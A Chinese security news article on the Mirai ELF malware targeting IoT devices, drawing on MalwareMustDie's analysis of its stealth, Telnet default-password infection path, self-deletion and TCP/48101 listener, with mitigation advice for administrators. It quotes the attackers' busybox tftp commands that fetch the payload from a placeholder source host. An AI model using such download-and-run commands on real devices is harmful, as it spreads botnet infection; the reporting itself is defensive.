Linux/Mirai ELF :专门攻击物联网设备的恶意软件

E安全9月7日讯 MalwareMustDie的专家发现了一款名为“ELF Linux/Mirai”的新型ELF木马后门，正针对物联网设备展开攻击。

MalwareMustDie专家八月分析了一个特殊的ELF木马后门样本—被称为ELF Linux/Mirai，目前该木马后门正针对物联网设备。这款恶意软件的名称与二进制“mirai.*”相同。据专家称，该恶意软件已发动数起攻击。

VirusTotal在线扫描服务公司证实，ELF Linux/Mirai十分隐秘，许多杀毒解决方案仍无法检测到，检测率极低。

MalwareMustDie博客中一份分析报告指出，“缺乏检测的原因在于缺乏样本，难以从受感染的物联网设备、路由器、DVR或WebIP摄像头和嵌入式平台中带有Busybox二进制的Linux中获取样本。”

Security Affairs检测的最后一个EFL为Linux木马Linux.PNScan，这款木马活跃针对x86 Linux路由器，设法安装后门。

但MalwareMustDie透露，Linux/Mirai比PnSan大得多。

分析指出，“这种威胁于8月初浮出水面，尽管这个ELF不易被检测，因为在安装后不会马上显示软件活动：只是静静待在这里，不会在系统中残留恶意软件，除了恶意软件运行的延迟过程外，所有文件均被删除。”

这就意味着当感染成功，难以通过未受感染的系统区分受感染的系统，除了内存分析。我们讨论的是一类不易分析并调试的设备。起初，对文件系统或外部网络流量的普通分析无法提供任何证据。

物联网环境不利。物联网塑造着新一类强大的僵尸网络，扩散至全球。哪个国家更易遭受此类攻击？

“具有Linux busybox嵌入式联网设备的国家，例如DVR或Web网络摄像头；以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标，尤其，未保护Telnet远程端口服务（Tcp/23）访问安全的设备或服务。”

“Linux/Mirai开发人员成功编码字符串并将流量分流来伪装自己。”

对于所有系统管理员最重要的是防御这类感染：与好朋友一起参与开放式过滤系统，安全工程师正努力推动—MalwareMustDie—正确的过滤签名提醒系统管理员是否遭受这类攻击威胁。在一个试点中，具有正确签名的系统管理员发现，仅仅几天内，攻击来源就有数百个地址。

似乎感染在扩散，僵尸网络似乎非常广泛。

这时，所有想要保护系统的系统管理员应当参看以下缓解措施：

• 如果你具有物联网设备，请确保未打开telnet服务，该服务未运行。

• 如果你未使用TCP/48101端口，请禁用，免于遭受感染和进一步损害。

• 监控telnet连接，因为用户感染的僵尸网络协议为Telnet服务。

• 逆向过程，寻找MalwareMustDie检测工具提示中报告的字符串。

然而，我们确切地知道Linux/Mirai ELF恶意软件，但为什么恶意软件分析专家却不热衷分析这款恶意软件？

MalwareMustDie表示，“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外，此款软件的真实样本难以获取，因为许多恶意软件分析专家必须在受感染的设备内存上提取，或者入侵CNC获取。”

这就意味着，如果我们关掉受感染的设备，取证分析难上加难：所有信息会丢失，并且可能需要新的感染程序重新启动。

之前的ELF恶意软件版本之间的最大不同点是什么？

MalwareMustDie指出，“相比过去的类似威胁，攻击者目前具有不同策略—尽量潜伏（延缓）、不被检测（AV或流量过滤器中的低检测率）、不可见（未追踪，也没有样本提取）、加密ELF的ASCII数据，保密分布。但很明显，攻击者的主要目的仍是DDoS僵尸网络，以通过他们所谓的Telnet扫描器快速将感染扩散至物联网设备。”

这款ELF真正隐秘地方在于，唯一的追踪途径是从运行的设备中提取内存。

感染模式

攻击者通过SSH或Telnet账号利用已知漏洞或使用默认密码入侵物联网设备。

如果以现有设备的感染条件作为目标，这类ELF使用特定的技术分叉（fork）新的进程，否则节点即为安全，安装不会继续。

一旦获取设备的外壳访问，攻击者将下载ELF Linux/Mirai恶意软件的有效荷载，下方为在物联网设备上执行操作的命令：

‘busybox tftp‘ -r [MalwareFile] -g [IPsource]

‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

难以分析Linux/Mirai感染，原因在于一旦执行，恶意软件还能删除痕迹。

MalwareMustDie团队表示，“Linux/Mirai感染的某些情况表明，该恶意软件在没有参数的情况下执行；某些情况下，执行后会删除下载的恶意软件文件。这种情况下，通常无法获取样本，除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”

“一经执行，该恶意软件将自行删除，避免留下踪迹，但进程仍在运行。”在lsof中能看见的一些物联网设备或带有特定PID的/proc列表，也就是：

/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (删除)

/proc/{PID}/exe -> ‘./{长字母字符串}’ alphabet (删除)

进程运行的同时，恶意软件还打开PF_INET（TCP的UNIX网络套接字），并将它绑定到本地主机IP地址127.0.0.1的端口TCP/48101，之后开始侦听连入连接。这款恶意软件通过新进程PID分叉新进程。受感染的设备将在其它设备的Telnet服务上进行连接，进一步实施滥用行为。

E安全注：本文系E安全编辑报道，转载请联系授权，并保留出处与链接，不得删减内容。联系方式：① 微信号zhu-geliang ②邮箱eapp@easyaq.com